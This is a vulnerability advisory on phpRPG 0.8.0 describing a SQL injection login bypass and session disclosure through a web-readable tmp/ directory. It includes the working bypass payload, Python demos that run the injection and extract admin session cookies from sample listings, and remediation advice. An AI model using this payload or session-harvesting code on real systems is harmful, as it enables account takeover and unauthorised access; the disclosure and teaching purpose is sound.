phpRPG - SQL Injection and Session Information Disclosure

Type securityvulns
Reporter Securityvulns
Modified 2007-12-16T00:00:00


By Michael Brooks
Vulnerability: SQL Injection and Session Information Disclosure.
Homepage:
Version affected: 0.8.0

There are two flaws that affect this application. The first is a nearly vanilla login bypass. If magic_quotes_gpc=off, submitting the following credentials logs an attacker in as the administrator:

username: 1'or 1=1 limit 1/*
password: 1

The unescaped quote closes the username string literal, `or 1=1` makes the WHERE clause true for every row, `limit 1` returns a single row, and `/*` turns the rest of the query, including the password check, into a comment. With magic_quotes_gpc=on the quote reaches the database as `\'` and the bypass fails, but the bug is only masked, not fixed. Keep in mind that magic_quotes_gpc is being removed in PHP 6, so it cannot be relied on as a defence.
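To see why that pair of values logs the attacker in, here is an added example (not code from phpRPG or from the advisory) that models a login query built by string concatenation, runs the payload against an in-memory SQLite database, and shows the parameterised query that closes the hole. The users table, its columns and the plaintext password comparison are assumptions; the advisory does not show phpRPG's real query. SQLite is used only as a convenient engine: it accepts the same `'... or 1=1 limit 1/*` structure, but unlike MySQL it does not treat backslash as a string escape, so the magic_quotes_gpc=on rendering is printed rather than executed.

```python
import sqlite3

# Added example: a minimal model of a login query built by string concatenation,
# the shape of bug the advisory describes. The users table, its columns and the
# plaintext password check are assumptions for illustration; the advisory does
# not show phpRPG's actual query.

PAYLOAD_USERNAME = "1'or 1=1 limit 1/*"   # the username from the advisory
PAYLOAD_PASSWORD = "1"                   # the password from the advisory


def addslashes(value):
    """Approximation of what magic_quotes_gpc=on does to request data in PHP:
    backslash-escapes single quotes, double quotes, backslashes and NUL."""
    escaped = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            escaped.append("\\" + ch)
        elif ch == "\x00":
            escaped.append("\\0")
        else:
            escaped.append(ch)
    return "".join(escaped)


def build_login_query(username, password, magic_quotes_gpc=False):
    """Build the query the way a vulnerable application does: by pasting
    request values straight into the SQL text."""
    if magic_quotes_gpc:
        username, password = addslashes(username), addslashes(password)
    return ("SELECT id, username, is_admin FROM users "
            "WHERE username='%s' AND password='%s'" % (username, password))


def make_db():
    """In-memory SQLite database with constructed sample users. The administrator
    is the first row, as in an install where the admin account is created first."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "correct horse battery staple", 1),
        (2, "player", "hunter2", 0),
    ])
    return conn


def vulnerable_login(conn, username, password):
    """Execute the concatenated query; returns the matched user row or None."""
    return conn.execute(build_login_query(username, password)).fetchone()


def safe_login(conn, username, password):
    """Same check with a parameterised query: the driver sends the values
    separately from the SQL text, so quotes in them cannot change its structure."""
    return conn.execute(
        "SELECT id, username, is_admin FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    conn = make_db()
    print(build_login_query(PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("vulnerable:   ", vulnerable_login(conn, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("parameterised:", safe_login(conn, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    # With magic_quotes_gpc=on the quote reaches MySQL as \' (a literal quote),
    # so the same payload no longer breaks out of the string literal.
    print(build_login_query(PAYLOAD_USERNAME, PAYLOAD_PASSWORD, magic_quotes_gpc=True))
```

Running it prints the concatenated query text, which reads `... WHERE username='1'or 1=1 limit 1/*' AND password='1'`: the WHERE clause is true for every row, `limit 1` returns the first account (the administrator) and everything from `/*` onward is a comment. The parameterised version returns no row for the same input. In PHP the equivalent is a mysqli or PDO prepared statement; escaping on input, whether magic_quotes or addslashes, only hides the bug.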

The second flaw allows an attacker to steal any session registered by phpRPG by navigating to this directory: http://localhost/phpRPG-0.8.0/tmp/ This is because phpRPG changes the session storage directory with session_save_path(), called in init.php on line 49, to a location inside the web root. PHP's file-based session handler stores each session as a file named sess_<session id>, so a directory listing of tmp/ discloses every active session ID, and fetching the files exposes the serialized session data itself.
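The following added example (not part of the advisory or of phpRPG) shows what a listable session directory hands to an attacker: it pulls the session IDs out of a directory listing, decodes the session files PHP's default 'files' handler writes, and produces the cookie that impersonates the privileged user. The listing, the session contents and the cookie name PHPSESSID (PHP's default session.name) are constructed assumptions, not data from a phpRPG install.

```python
import re

# Added example: what a listable session directory gives an attacker. The
# directory listing and session file contents below are constructed samples in
# the shape of an Apache autoindex page and PHP's default 'files' session
# handler, not captures from phpRPG. PHPSESSID is PHP's default session.name
# and is an assumption about the target.

SAMPLE_LISTING = """<html><head><title>Index of /phpRPG-0.8.0/tmp</title></head><body>
<h1>Index of /phpRPG-0.8.0/tmp</h1>
<a href="../">Parent Directory</a>
<a href="sess_0123456789abcdef0123456789abcdef">sess_0123456789abcdef0123456789abcdef</a> 2007-12-15 21:03 312
<a href="sess_fedcba9876543210fedcba9876543210">sess_fedcba9876543210fedcba9876543210</a> 2007-12-15 22:41 298
<a href="cache.lock">cache.lock</a> 2007-12-15 20:00 0
</body></html>"""

# Contents of tmp/sess_<id>, as an attacker would fetch them over HTTP once the
# IDs are known. PHP's session serializer writes name|serialize(value) pairs.
SAMPLE_SESSION_FILES = {
    "0123456789abcdef0123456789abcdef": 'user_id|i:7;username|s:6:"player";is_admin|b:0;',
    "fedcba9876543210fedcba9876543210": 'user_id|i:1;username|s:5:"admin";is_admin|b:1;',
}

SESSION_FILE_RE = re.compile(r'href="sess_([A-Za-z0-9,-]{1,128})"')


def extract_session_ids(listing_html):
    """Session IDs disclosed by the listing (file name minus the sess_ prefix)."""
    return sorted(set(SESSION_FILE_RE.findall(listing_html)))


def _parse_value(data, pos):
    """Parse one PHP serialize() value starting at pos; return (value, new_pos).
    Handles N, i, b, d, s and a, which covers typical session data. PHP string
    lengths are byte counts; this reader assumes ASCII data."""
    t = data[pos]
    if t == "N":
        return None, pos + 2                      # "N;"
    if t in "ibd":
        end = data.index(";", pos)
        raw = data[pos + 2:end]                   # text between "x:" and ";"
        if t == "i":
            return int(raw), end + 1
        if t == "b":
            return raw == "1", end + 1
        return float(raw), end + 1
    if t == "s":
        colon = data.index(":", pos + 2)          # s:<len>:"<bytes>";
        length = int(data[pos + 2:colon])
        start = colon + 2                         # skip ':"'
        return data[start:start + length], start + length + 2
    if t == "a":
        colon = data.index(":", pos + 2)          # a:<count>:{key;value;...}
        count = int(data[pos + 2:colon])
        pos = colon + 2                           # skip ':{'
        items = {}
        for _ in range(count):
            key, pos = _parse_value(data, pos)
            value, pos = _parse_value(data, pos)
            items[key] = value
        return items, pos + 1                     # skip '}'
    raise ValueError("unsupported serialized type %r at offset %d" % (t, pos))


def parse_php_session(data):
    """Decode a PHP 'php'-format session file into a dict."""
    session, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        name = data[pos:bar]
        value, pos = _parse_value(data, bar + 1)
        session[name] = value
    return session


def hijackable_sessions(listing_html, session_files):
    """For each session ID disclosed by the listing whose file could be fetched,
    return (session_id, decoded_data, cookie_header)."""
    results = []
    for sid in extract_session_ids(listing_html):
        if sid in session_files:
            data = parse_php_session(session_files[sid])
            results.append((sid, data, "Cookie: PHPSESSID=%s" % sid))
    return results


def admin_cookie(listing_html, session_files):
    """The cookie that would make the attacker the administrator, or None."""
    for sid, data, cookie in hijackable_sessions(listing_html, session_files):
        if data.get("is_admin"):
            return cookie
    return None


if __name__ == "__main__":
    for sid, data, cookie in hijackable_sessions(SAMPLE_LISTING, SAMPLE_SESSION_FILES):
        print(sid, data, cookie)
    print("admin:", admin_cookie(SAMPLE_LISTING, SAMPLE_SESSION_FILES))
```

The fix is to keep session files outside the document root (a session_save_path() below the web root, or simply PHP's default) and, as defence in depth, to deny web access to tmp/ and disable directory indexes. Session ID entropy does not help here: the IDs are read from disk, not guessed.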